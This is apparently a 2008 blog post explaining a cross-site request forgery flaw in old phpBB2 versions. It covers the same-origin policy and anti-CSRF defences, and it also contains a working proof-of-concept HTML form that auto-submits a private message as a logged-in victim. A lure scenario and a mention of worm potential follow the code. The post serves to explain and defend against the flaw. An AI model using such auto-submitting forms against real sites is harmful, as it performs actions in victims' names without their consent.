Garo Garabedyan's Divergent Thinking Blog

Cross-site request forgery on phpBB old versions

leave a comment »

Same origin policy and Cross-site request forgery (CSRF)

Same origin policy in web browsers and attack techs: http://taossa.com/index.php/2007/02/08/same-origin-policy/

Cross-site request forgery is possible on some versions of phpBB, but not on the new phpBB3.

One interesting thing about same origin policy on the web browsers is that you have to get known of it when you want to develop secure web application. Web is made with the idea of open access and you have to express your wish of secure connection when you need it, but to express nothing when you want to remain a public connection. Public connection is by default applied on every web interface.

You can search on the web about many techniques protecting from CSRF. And you can find explanations in details. It is important this techniques to be applied to the all links and/or forms which produces activities on the user(s) and/or on the site and/or on third party machines/users.

Few of them are:

  1. Unique Secret hidden fields (to the form or the request are added static unique fields which are checked for equality on the server)
  2. Double submit the cookie (it is a better technique (session ID is an unique field by its origin) which is easier and on the same idea)

Note: It is important to mention that when you use JSON as a data transport mechanism between browser and server you are vulnerable by one new attack (explained here: https://garabedyan.wordpress.com/2007/05/02/json-vulnerabilities/) .

phpBB

phpBB is a very popular Open Source forum.

Vulnerable files:

  • privmsg.php (in phpBB3 its role is taken by ucp.php)
  • posting.php

Interesting fact is that logout.php in the both cases is protected.

In phpBB3 is used Double submit the cookie protection mechanism by adding the “sid” (session ID) parameter to every important link/form.

Example of an exploit

In the example the attack is on http://some.domain.com/forum/privmsg.php and tries to send message to user TheBoZZ with body “TheBoZZ’s message body” (without the “). The attack will succeed if the user which visits this page is logged in http://some.domain.com/forum/ phpBB forum and by this act it has a valid sid cookie on the machine.

This example doesn’t contain any social engineering, the user have to visit page containing this code in order to execute the exploit and after it he will see a message explaining that the message is sent successfully (in general, we can’t be sure of the proper delivery of the message).

<form action=”http://some.domain.com/forum/privmsg.php&#8221; method=”post” name=”post”>
<input type=”text” class=”post” name=”username” maxlength=”25″ size=”25″ tabindex=”1″ value=”TheBoZZ” />
<input type=”text” name=”subject” size=”45″ maxlength=”60″ style=”width:450px” tabindex=”2″ class=”post” value=”subject line” />
<input type=”button” class=”button” accesskey=”b” name=”addbbcode0″ value=” B ” style=”font-weight:bold; width: 30px” onClick=”bbstyle(0)” onMouseOver=”helpline(‘b’)” />
<input type=”button” class=”button” accesskey=”i” name=”addbbcode2″ value=” i ” style=”font-style:italic; width: 30px” onClick=”bbstyle(2)” onMouseOver=”helpline(‘i’)” />
<input type=”button” class=”button” accesskey=”u” name=”addbbcode4″ value=” u ” style=”text-decoration: underline; width: 30px” onClick=”bbstyle(4)” onMouseOver=”helpline(‘u’)” />
<input type=”button” class=”button” accesskey=”q” name=”addbbcode6″ value=”Quote” style=”width: 50px” onClick=”bbstyle(6)” onMouseOver=”helpline(‘q’)” />
<input type=”button” class=”button” accesskey=”c” name=”addbbcode8″ value=”Code” style=”width: 40px” onClick=”bbstyle(8)” onMouseOver=”helpline(‘c’)” />
<input type=”button” class=”button” accesskey=”l” name=”addbbcode10″ value=”List” style=”width: 40px” onClick=”bbstyle(10)” onMouseOver=”helpline(‘l’)” />
<input type=”button” class=”button” accesskey=”o” name=”addbbcode12″ value=”List=” style=”width: 40px” onClick=”bbstyle(12)” onMouseOver=”helpline(‘o’)” />
<input type=”button” class=”button” accesskey=”p” name=”addbbcode14″ value=”Img” style=”width: 40px” onClick=”bbstyle(14)” onMouseOver=”helpline(‘p’)” />
<input type=”button” class=”button” accesskey=”w” name=”addbbcode16″ value=”URL” style=”text-decoration: underline; width: 40px” onClick=”bbstyle(16)” onMouseOver=”helpline(‘w’)” />
<option value=”7″ class=”genmed”></option>
<option value=”9″ class=”genmed”></option>
<option value=”12″ selected class=”genmed”>a</option>
<option value=”18″ class=”genmed”></option>
<option value=”24″ class=”genmed”></option>
<input type=”text” name=”helpbox” size=”45″ maxlength=”100″ style=”width:450px; font-size:10px” class=”helpline” />
<textarea name=”message” rows=”15″ cols=”35″ wrap=”virtual” style=”width:450px” tabindex=”3″ class=”post” onselect=”storeCaret(this);” onclick=”storeCaret(this);” onkeyup=”storeCaret(this);”>TheBoZZ’s message body</textarea>
<input type=”checkbox” name=”disable_bbcode” />
<input type=”checkbox” name=”disable_smilies”/>
<input type=”checkbox” name=”attach_sig” />
<input type=”hidden” name=”folder” value=”inbox” />
<input type=”hidden” name=”mode” value=”post” />
<input type=”hidden” accesskey=”s” tabindex=”6″ name=”post” class=”mainoption”/>
</form>

<script>
document.post.submit();
</script>

Hack scenario

The attacker sends a message (Private Message or Forum post but if it is the second, only logged in visitors will get affected) to a victim user(s) in a forum. The victim opens it/ views it and sees a link to evel.com/evil.html, when he visits this page, CSRF phpBB is activated and a few messages are sent/ a few forum posts are made (you can make more than one CSRF by visiting evil link).

It is possible to create a worm like malicious code like the Ajax Sammy worm, by using the explained CSRF vulnerability.

Vulnerable versions

phpBB 2.0.22 is treated as immune, this vulnerability I exploit on older versions of phpBB2.

Advertisements

Written by garabedyan

January 1, 2008 at 18:37

Posted in Uncategorized

Tagged with , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s